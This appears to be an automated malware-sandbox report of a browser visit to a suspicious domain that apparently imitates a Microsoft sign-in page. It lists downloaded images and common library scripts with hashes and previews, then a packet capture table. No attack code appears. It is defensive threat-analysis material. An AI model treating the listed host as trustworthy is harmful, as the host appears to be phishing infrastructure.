                                                                                        SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                                                                        MD5:C33DE66281E933259772399D10A6AFE8
                                                                                        SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                                                                        SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                                                                        SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://incomestatementdocument.classical.it.com/cdn-cgi/images/icon-exclamation.png?1376755637
                                                                                        Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):1864
                                                                                        Entropy (8bit):5.222032823730197
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 28 x 87, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.068159130770306
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPlhotnl1VXx7Bxl/k4E08up:6v/lhPEtlD7Tp
                                                                                        MD5:E05F185BC19B942295F6274C093E80EF
                                                                                        SHA1:D500FE4D90EF7AE7FC149E11E84072CF1BAB2BB7
                                                                                        SHA-256:49BF1F629ECF45D2D614A9843912D83DBAE59C24DB1DCC7D3CEB002E3BD1A13D
                                                                                        SHA-512:B42CE3057E5C11A8AD205CF0BA93BFD7D1A6A2818EC929F536555C47FDFD6CFD364AAADE317C72F1C05BF103AB6E3CB355ACCD73E5A294BAB762C4C849A4CD42
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/923707b7eceb8ce8/1742492800972/GKCgZTjmCvgxbop
                                                                                        Preview:.PNG........IHDR.......W.......l....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (50758)
                                                                                        Category:downloaded
                                                                                        Size (bytes):51039
                                                                                        Entropy (8bit):5.247253437401007
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 28 x 87, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.068159130770306
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPlhotnl1VXx7Bxl/k4E08up:6v/lhPEtlD7Tp
                                                                                        MD5:E05F185BC19B942295F6274C093E80EF
                                                                                        SHA1:D500FE4D90EF7AE7FC149E11E84072CF1BAB2BB7
                                                                                        SHA-256:49BF1F629ECF45D2D614A9843912D83DBAE59C24DB1DCC7D3CEB002E3BD1A13D
                                                                                        SHA-512:B42CE3057E5C11A8AD205CF0BA93BFD7D1A6A2818EC929F536555C47FDFD6CFD364AAADE317C72F1C05BF103AB6E3CB355ACCD73E5A294BAB762C4C849A4CD42
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.......W.......l....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (19015)
                                                                                        Category:downloaded
                                                                                        Size (bytes):19188
                                                                                        Entropy (8bit):5.212814407014048
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                        Category:downloaded
                                                                                        Size (bytes):17174
                                                                                        Entropy (8bit):2.9129715116732746
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):21873
                                                                                        Entropy (8bit):2.877142515573533
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:OR1111111118111111111111111111111111111111111111111111111111111l:OO
                                                                                        MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                                                        SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                                                        SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                                                        SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png
                                                                                        Preview:.PNG........IHDR...............A.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D102A13741CE11E6A31DDAB08C35506E" xmpMM:DocumentID="xmp.did:D102A13841CE11E6A31DDAB08C35506E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D102A13541CE11E6A31DDAB08C35506E" stRef:documentID="xmp.did:D102A13641CE11E6A31DDAB08C35506E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.A....Q.IDATx...?..Q.........0..H.B.lcVA5....PLc...VD.EC.5.`.;..y.sN..or..t:........>gl.........<...........<.........x...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):2309
                                                                                        Entropy (8bit):3.9533709859154516
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:n/6fBvwuCkkkkkkkkkkkkkkkkkkkkkkkkkkJYfkkkkkkkkkkkkkkkkkkkkkkkkk+:n/6Zv/V
                                                                                        MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                                                        SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                                                        SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                                                        SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                        Category:dropped
                                                                                        Size (bytes):621
                                                                                        Entropy (8bit):7.673946009263606
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):196
                                                                                        Entropy (8bit):5.098952451791238
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezocKqD:J0+oxBeRmR9etdzRxGez1T
                                                                                        MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                                                        SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                                                        SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                                                        SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://incomestatementdocument.classical.it.com/favicon.ico
                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):452
                                                                                        Entropy (8bit):7.0936408308765495
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                                                                        MD5:C33DE66281E933259772399D10A6AFE8
                                                                                        SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                                                                        SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                                                                        SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (48122)
                                                                                        Category:downloaded
                                                                                        Size (bytes):48123
                                                                                        Entropy (8bit):5.342998089666478
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:gCbPzVMta23aGa0rn5iWqS2kdX+iGwS3EjtCsCXY2KIEjkNY1LBep7iFFQ7XIrva:Ita2qGa0rn5Rq05GE2K9k7
                                                                                        MD5:EA38BDA3C117E2FE01BD862003357394
                                                                                        SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                                                        SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                                                        SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                                                        Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        No static file info

                                                                                        Download Network PCAP: filteredfull

                                                                                        • Total Packets: 742
                                                                                        • 443 (HTTPS)
                                                                                        • 80 (HTTP)
                                                                                        • 53 (DNS)
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 20, 2025 18:46:23.995995045 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:23.996052027 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:23.996145010 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:23.996432066 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:23.996433020 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:23.996467113 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:23.996526003 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:23.996613979 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:23.996702909 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:23.996727943 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.221436977 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.221541882 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.222832918 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.222863913 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.223083973 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.223452091 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.228883028 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.228985071 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.229881048 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.229897022 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.230386019 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.264322042 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.273447037 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.473155975 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.473201036 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.473227024 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.473252058 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.473299980 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.473354101 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.473380089 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.473386049 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.473436117 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.475492001 CET49704443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.475523949 CET44349704172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.492660046 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.536317110 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.586595058 CET49707443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.586685896 CET4434970735.190.80.1192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.586793900 CET49707443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.587421894 CET49707443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.587452888 CET4434970735.190.80.1192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.590533018 CET49707443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.591417074 CET49708443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.591485023 CET4434970835.190.80.1192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.591551065 CET49708443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.593950033 CET49708443192.168.2.1635.190.80.1
                                                                                        Mar 20, 2025 18:46:24.593981981 CET4434970835.190.80.1192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.602372885 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.632349014 CET4434970735.190.80.1192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.654428005 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.654452085 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.702399969 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.706861973 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707062006 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707120895 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.707129955 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707225084 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707268953 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.707274914 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707386971 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707439899 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.707447052 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707550049 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707602024 CET49703443192.168.2.16172.67.216.207
                                                                                        Mar 20, 2025 18:46:24.707607031 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707705021 CET44349703172.67.216.207192.168.2.16
                                                                                        Mar 20, 2025 18:46:24.707802057 CET44349703172.67.216.207192.168.2.16
